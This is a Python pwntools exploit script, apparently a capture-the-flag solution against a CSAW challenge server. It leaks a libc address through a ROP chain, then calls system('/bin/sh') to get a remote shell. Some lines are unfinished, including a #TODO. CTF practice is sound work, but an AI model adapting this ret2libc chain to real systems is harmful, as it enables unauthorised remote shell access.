from pwn import *

# Addresses taken from the challenge binary: a "pop rdi; ret" gadget,
# puts@plt, the GOT entry of puts, and the start of main (used to
# return to the vulnerable code for a second round trip).
poprdi = 0x00000000004006a3
putsplt = 0x4004b0
putslibc = 0x600fd8
mainstart = 0x4005d6

#pe = process('./adhd')
#gdb.attach(pe)
pe = remote("pwn.chal.csaw.io", 10102)
libc = ELF('./libc.so.6')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Stage 1: leak the runtime address of puts by calling puts(puts@got),
# then return to main.
pe.recvline()
pe.sendline(p64(poprdi) + p64(putslibc) + p64(putsplt) + p64(mainstart))
x = pe.recvline()
# Strip the trailing newline and pad the 6-byte leak to 8 bytes for u64.
libcPuts = u64(x[:-1] + '\x00\x00')
print libcPuts

# Compute the libc base from the leak, then the runtime addresses of
# system() and the "/bin/sh" string.
libcbase = libcPuts - libc.symbols['puts']
system = libc.symbols['system'] + libcbase
binsh = libcbase + libc.search("/bin/sh").next()
print libc.search("n < d").next()
print libc.search("/bin/sh").next()

# Stage 2: call system("/bin/sh") and return to main again.
pe.recvline()
pe.sendline((p64(poprdi) + p64(binsh) + p64(system)) * 1 + p64(mainstart))
print pe.recvline()
pe.sendline((p64(poprdi) + p64(binsh + 1625367 - 1625299 - 4) + p64(system)) * 2 + p64(mainstart))
#TODO
pe.interactive()